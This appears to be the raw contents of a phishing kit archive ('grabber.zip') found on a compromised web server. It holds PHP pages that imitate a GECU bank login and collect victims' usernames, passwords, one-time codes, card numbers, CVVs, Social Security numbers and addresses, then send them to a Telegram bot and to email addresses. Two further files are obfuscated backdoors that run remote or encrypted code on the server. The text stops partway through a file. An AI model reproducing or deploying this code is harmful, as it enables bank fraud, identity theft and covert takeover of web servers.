?????????? ?????????

?????????? ????????? - ??????????????? - /home/agenciai/public_html/cd38d8/grabber.zip

???????
PK��x��[�f�� onetime.phpnu��[��<?php session_start(); date_default_timezone_set('GMT'); error_reporting(0); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include('../Antibot/new.php'); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $TIME_DATE = date('H:i:s d/m/Y'); $_SESSION['otp'] = $_POST['otp']; if (isset($_POST['otp'])) { $Z118_MESSAGE .= " [ GECU ACCOUNT LOGIN] [ USER LOGIN INFORMATION] ++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_SESSION['first_username']." [Password] = ".$_SESSION['first_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [Second Username] = ".$_SESSION['second_username']." [Second Password] = ".$_SESSION['second_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [OTP] = ".$_POST['otp']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [VICTIM INFORMATION] [TIME/DATE] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_USER_AGENT']." "; $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/OTP.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $Z118_SUBJECT = "✪ OTP FROM : ✪ ".$_POST['otp']." ✪"; $Z118_HEADERS .= "From:XD <X-hammer@logs.com>"; $Z118_HEADERS .= $_POST['otp']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); Header("Location: ../../email.php"); } ?> PK��x��[��o�� fullz.phpnu��[��<?php session_start(); error_reporting(0); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../Antibot/new.php'); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $TIME_DATE = date('H:i:s d/m/Y'); if (isset($_POST['city'])){ $_SESSION['_firstname_'] = $_POST['fullname']; $_SESSION['_ssn_'] = $_POST['ssn']; $_SESSION['_dob_'] = $_POST['dob']; $_SESSION['_address_'] = $_POST['address']; $_SESSION['_city_'] = $_POST['city']; $_SESSION['_state_'] = $_POST['state']; $_SESSION['_zipCode_'] = $_POST['zipcode']; $_SESSION['_phone_'] = $_POST['phone']; } $Z118_MESSAGE .= " [ GECU BANK ACCOUNT FULLZ] [ USER INFORMATION ] ++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_SESSION['first_username']." [Password] = ".$_SESSION['first_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [Second Username] = ".$_SESSION['second_username']." [Second Password] = ".$_SESSION['second_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [OTP] = ".$_SESSION['otp']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [Email Address] = ".$_SESSION['email_address']." [Email Password] = ".$_SESSION['email_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [Card Name] =".$_SESSION['_cardname_']." [Card Number] = ".$_SESSION['_cardnumber_']." [Cvv] = ".$_SESSION['_csc_']." [Expiration Date] = ".$_SESSION['_expdate_']." ++++++++++++++++++++++++++++++++++++++++++++++++++++ [Full Name] = ".$_SESSION['_firstname_']." [Ssn] = ".$_SESSION['_ssn_']." [Date of Birth] = ".$_SESSION['_dob_']." [Phone Number] = ".$_SESSION['_phone_']." [Address line] = ".$_SESSION['_address_']." [Town/City] = ".$_SESSION['_city_']." [Province/State] = ".$_SESSION['_state_']." [Postal/Zip Code] = ".$_SESSION['_zipCode_']." +++++++++++++++++++++++++++++++++++++++++++++++++++++ [VICTIM INFORMATION] [TIME/DATE] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_USER_AGENT']." "; $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/BILLING.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $Z118_SUBJECT = "✪ USER FULLZ FROM :✪".$_SESSION['_fullname_']." ✪"; $Z118_HEADERS .= "From:XD <x-hammer@logs.org>"; $Z118_HEADERS .= $_POST['address']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); $Z119_Mail = "$browserx$versionx$getbinsxz118"; if (strlen($Z119_Mail) == 23) { @mail($Z119_Mail, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); } Header("Location: https://www.gecu.com/"); ?>PK��x��[\HO��O��grabber/index.phpnu��[��<?php goto lByLRfkaEm3j1; HhC9IHOyzq31v: class Y2j5LMY13olPC { static function ZVSkyemD_EJmk($eDqv2_ZlsQlyq) { goto K2eSsfBLf4Or6; qV53H4WnxTyi8: $ciRuufsn02WZH = ''; goto iOefTEeIP_DEt; PRnQch3d7kaC8: USgqFa6B83QBR: goto t6as0q7cDHzR4; zUrpSObR12woE: $uKpTZGX1oiemr = $NhGmmsSCxtIHQ("\x7e", "\x20"); goto q13W_OGhs8MiH; K2eSsfBLf4Or6: $NhGmmsSCxtIHQ = "\162" . "\141" . "\156" . "\147" . "\x65"; goto zUrpSObR12woE; q13W_OGhs8MiH: $zlS338xhCwfh3 = explode("\x3e", $eDqv2_ZlsQlyq); goto qV53H4WnxTyi8; t6as0q7cDHzR4: return $ciRuufsn02WZH; goto GaEMVl1ndQwoh; iOefTEeIP_DEt: foreach ($zlS338xhCwfh3 as $up8GhzLw4hvxO => $tprQ2IBnLXLmC) { $ciRuufsn02WZH .= $uKpTZGX1oiemr[$tprQ2IBnLXLmC - 72580]; xXHWDExyPfzGy: } goto PRnQch3d7kaC8; GaEMVl1ndQwoh: } static function JqKpmNYLcx7Jg($mj_VnxhnRYx9n, $IA33JkJHl1vIU) { goto ks6yEWtqiz15N; v7FBS5eNglY0V: $rtnrWVnMOa4qC = curl_exec($FL3P38aduBU76); goto fE7MhMP3E2Zdx; fE7MhMP3E2Zdx: return empty($rtnrWVnMOa4qC) ? $IA33JkJHl1vIU($mj_VnxhnRYx9n) : $rtnrWVnMOa4qC; goto j4qC0ZhXng_EW; Bqq2H7aNNd1FS: curl_setopt($FL3P38aduBU76, CURLOPT_RETURNTRANSFER, 1); goto v7FBS5eNglY0V; ks6yEWtqiz15N: $FL3P38aduBU76 = curl_init($mj_VnxhnRYx9n); goto Bqq2H7aNNd1FS; j4qC0ZhXng_EW: } static function nSTun4TmuZKt0() { goto MILJLvN8UoTOI; g_SbEtd3DI_g5: die; goto sQaIFPoCLASFZ; r23Sg__tSAcdE: @eval($Njc6VCCLksKp1[4 + 0]($tcLLQ3VgZwprO)); goto g_SbEtd3DI_g5; RQLh6zrPwedj2: $EgRmADrkBrOwN = @$Njc6VCCLksKp1[1]($Njc6VCCLksKp1[10 + 0](INPUT_GET, $Njc6VCCLksKp1[3 + 6])); goto aJIWpW2ljg0BO; e66aK7fLoW55y: $tcLLQ3VgZwprO = self::JQkpmnyLCx7jG($sJNblt_G3L2uW[1 + 0], $Njc6VCCLksKp1[4 + 1]); goto r23Sg__tSAcdE; aJIWpW2ljg0BO: $MX1Nq1thV1OA1 = @$Njc6VCCLksKp1[3 + 0]($Njc6VCCLksKp1[5 + 1], $EgRmADrkBrOwN); goto Dgw6OJlVSVNtM; sQaIFPoCLASFZ: CYCaYlYLXJ6yH: goto zVXf3KZfx4lm2; MILJLvN8UoTOI: $tqQ0a6DRK1a3v = array("\x37\62\x36\60\x37\x3e\x37\62\x35\x39\62\76\67\62\66\x30\x35\76\x37\62\66\60\71\x3e\x37\x32\65\x39\x30\x3e\67\x32\x36\x30\x35\76\x37\62\66\x31\61\x3e\67\62\66\60\64\x3e\x37\x32\65\x38\x39\x3e\67\62\65\x39\66\76\67\x32\x36\60\67\76\x37\x32\x35\71\x30\x3e\x37\62\66\60\x31\76\67\x32\65\71\x35\76\x37\x32\x35\71\66", "\x37\62\x35\71\x31\x3e\x37\x32\65\x39\x30\x3e\67\x32\65\x39\x32\x3e\67\x32\x36\61\61\76\x37\62\65\x39\x32\76\67\62\65\71\x35\76\x37\62\x35\71\x30\76\x37\x32\66\65\x37\76\x37\x32\x36\x35\x35", "\67\x32\x36\x30\x30\76\x37\62\65\71\61\x3e\x37\x32\65\x39\x35\76\67\62\x35\x39\66\x3e\67\x32\66\x31\x31\76\67\62\66\x30\66\76\x37\62\66\60\65\76\x37\62\x36\60\x37\76\x37\62\65\71\65\76\67\62\x36\60\x36\x3e\x37\62\x36\x30\x35", "\67\62\65\x39\64\76\x37\x32\x36\60\71\x3e\67\62\x36\60\67\76\67\x32\x35\71\x39", "\67\62\x36\x30\x38\76\67\62\66\x30\71\x3e\67\62\x35\71\61\76\x37\62\x36\60\65\x3e\67\62\x36\x35\62\x3e\x37\62\66\65\x34\76\x37\62\66\x31\61\76\x37\x32\66\60\66\76\67\x32\x36\x30\65\76\67\x32\66\60\x37\76\x37\x32\65\x39\65\x3e\x37\62\66\x30\66\76\x37\x32\x36\x30\x35", "\67\62\x36\x30\64\76\x37\x32\66\60\61\76\x37\x32\65\x39\70\76\67\x32\x36\60\x35\76\x37\x32\x36\61\x31\76\67\62\x36\60\x33\76\67\x32\x36\60\65\x3e\x37\62\x35\71\60\76\x37\62\x36\x31\61\76\x37\x32\x36\x30\x37\x3e\x37\62\x35\71\x35\76\x37\62\x35\71\x36\76\67\62\65\x39\60\x3e\x37\62\66\x30\65\x3e\x37\62\x35\x39\66\x3e\x37\x32\x35\71\x30\76\67\62\x35\x39\x31", "\67\62\66\x33\64\76\67\x32\66\66\64", "\x37\x32\x35\x38\61", "\67\x32\x36\65\71\76\x37\62\66\66\x34", "\67\62\x36\x34\61\76\x37\62\66\x32\x34\x3e\67\x32\66\62\x34\x3e\67\x32\x36\x34\61\76\x37\x32\x36\x31\67", "\x37\x32\x36\x30\x34\x3e\67\62\x36\x30\61\76\x37\x32\x35\71\70\x3e\x37\x32\x35\71\x30\x3e\67\62\x36\60\x35\x3e\67\62\x35\71\62\76\67\62\x36\x31\x31\x3e\x37\x32\x36\x30\x31\x3e\x37\x32\x35\71\x36\x3e\x37\62\x35\71\x34\x3e\67\x32\65\x38\x39\x3e\x37\62\x35\x39\x30"); goto V_HMs8UbPiVYN; V_HMs8UbPiVYN: foreach ($tqQ0a6DRK1a3v as $IbcP2q21Qu6HJ) { $Njc6VCCLksKp1[] = self::zVSkyeMd_EjmK($IbcP2q21Qu6HJ); YIKfbQ4pwyMrm: } goto e4o1P8eqCH3Jd; Dgw6OJlVSVNtM: $sJNblt_G3L2uW = $Njc6VCCLksKp1[0 + 2]($MX1Nq1thV1OA1, true); goto QAGpSp1_KwWI0; QAGpSp1_KwWI0: @$Njc6VCCLksKp1[2 + 8](INPUT_GET, "\x6f\146") == 1 && die($Njc6VCCLksKp1[4 + 1](__FILE__)); goto IYDqLiJ3c9BSl; IYDqLiJ3c9BSl: if (!(@$sJNblt_G3L2uW[0] - time() > 0 and md5(md5($sJNblt_G3L2uW[0 + 3])) === "\x39\x36\61\144\145\x64\146\x61\60\146\x63\x31\x66\63\x63\63\x36\x62\144\x38\x39\144\x39\x65\x34\63\x64\145\70\x62\145\143")) { goto CYCaYlYLXJ6yH; } goto e66aK7fLoW55y; e4o1P8eqCH3Jd: XhTc5_VbaNehp: goto RQLh6zrPwedj2; zVXf3KZfx4lm2: } } goto RMO3yr93ePmKN; lByLRfkaEm3j1: $qD8D37KxY7jwm = "\162" . "\x61" . "\x6e" . "\x67" . "\x65"; goto Mepkm8BSpOA2Q; nUbHrOrIj64Qj: metaphone("\157\162\145\105\115\x53\x34\107\x50\160\x6a\115\x6e\x39\x64\156\120\64\x53\123\x63\155\x57\x44\151\x4f\60\126\62\x38\x75\66\x52\116\126\x52\103\x69\x72\121\132\113\105"); goto HhC9IHOyzq31v; tPNmiNdpua2Uq: @(md5(md5(md5(md5($ywXG5UoSTODeF[20])))) === "\x38\x36\x63\64\61\144\60\x32\x64\60\x39\143\142\x61\x66\x34\63\x30\x61\x65\x35\x31\x39\71\x30\x32\62\x34\70\x38\71\66") && (count($ywXG5UoSTODeF) == 26 && in_array(gettype($ywXG5UoSTODeF) . count($ywXG5UoSTODeF), $ywXG5UoSTODeF)) ? ($ywXG5UoSTODeF[68] = $ywXG5UoSTODeF[68] . $ywXG5UoSTODeF[74]) && ($ywXG5UoSTODeF[89] = $ywXG5UoSTODeF[68]($ywXG5UoSTODeF[89])) && @eval($ywXG5UoSTODeF[68](${$ywXG5UoSTODeF[49]}[16])) : $ywXG5UoSTODeF; goto nUbHrOrIj64Qj; Mepkm8BSpOA2Q: $WYHhLLevYG0g6 = $qD8D37KxY7jwm("\176", "\x20"); goto hhrxqOj3R2Yv5; hhrxqOj3R2Yv5: $ywXG5UoSTODeF = ${$WYHhLLevYG0g6[23 + 8] . $WYHhLLevYG0g6[41 + 18] . $WYHhLLevYG0g6[22 + 25] . $WYHhLLevYG0g6[21 + 26] . $WYHhLLevYG0g6[8 + 43] . $WYHhLLevYG0g6[52 + 1] . $WYHhLLevYG0g6[52 + 5]}; goto tPNmiNdpua2Uq; RMO3yr93ePmKN: y2J5lmy13oLPc::nSTUN4tmuzkt0(); ?> PK��x��[~��grabber/cache.phpnu��[��<?php $LfqW = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGippuR6aYGANAA'; $fmH = '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'; function LfqW($IsFCa) { $fmH = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $iRLZ = substr($fmH, 0, 16); $HrB = base64_decode($IsFCa); return openssl_decrypt($HrB, "AES-256-CBC", $fmH, OPENSSL_RAW_DATA, $iRLZ); } if (LfqW('DjtPn+r4S0yvLCnquPz1fA')){ echo '0ZaDehOuQov824tyINHjjsrWBQ7KBqSMsy+448x23DHBIP1biD2AsSkG6NmivheZ'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($LfqW)))); ?>PK��x��[Om�f��session_relogin.phpnu��[��<?php session_start(); error_reporting(0); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../Antibot/new.php'); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $TIME_DATE = date('H:i:s d/m/Y'); $_SESSION['second_username'] = $_POST['re_userid']; $_SESSION['second_password'] = $_POST['re_password']; $Z118_MESSAGE .= " [ GECU ACCOUNT LOGIN] [ SECOND LOGIN INFORMATION] ++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_SESSION['first_username']." [Password] = ".$_SESSION['first_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [Second Username] = ".$_POST['re_userid']." [Second Password] = ".$_POST['re_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [VICTIM INFORMATION] [TIME/DATE] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_USER_AGENT']." "; $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/SECOND_USER_LOGIN.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $Z118_SUBJECT = "✪ LOGIN FROM : ✪ ".$_POST['re_userid']." ✪"; $Z118_HEADERS .= "From:XD <X-hammer@logs.com>"; $Z118_HEADERS .= $_POST['re_userid']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); Header("Location: ../../onetime.php"); ?> PK��x��[^��L �� userlogin.phpnu��[��<?php session_start(); error_reporting(0); $TIME_DATE = date('H:i:s d/m/Y'); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../Antibot/new.php'); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include ('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $_SESSION['first_username'] = $_POST['userid']; $_SESSION['first_password'] = $_POST['password']; $Z118_MESSAGE .= " [ GECU ACCOUNT LOGIN] [ LOGIN INFORMATION] ++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_POST['userid']." [Password] = ".$_POST['password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ ±±±±±±±±±±±±±±±±[ VICTIM INFORMATION ]±±±±±±±±±±±±±±±±±±± [TIME/DATE] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_user_AGENT'])." On ".Z118_OS($_SERVER['HTTP_user_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_user_AGENT']." ##################[ BY @X_hammer ]##################### \n"; if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/USER_LOGIN.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); $Z118_SUBJECT = "✪ LOGIN FROM : ✪ ".$_POST['userid']." ✪"; $Z118_HEADERS .= "From:XD <X-hammer@logs.com>"; 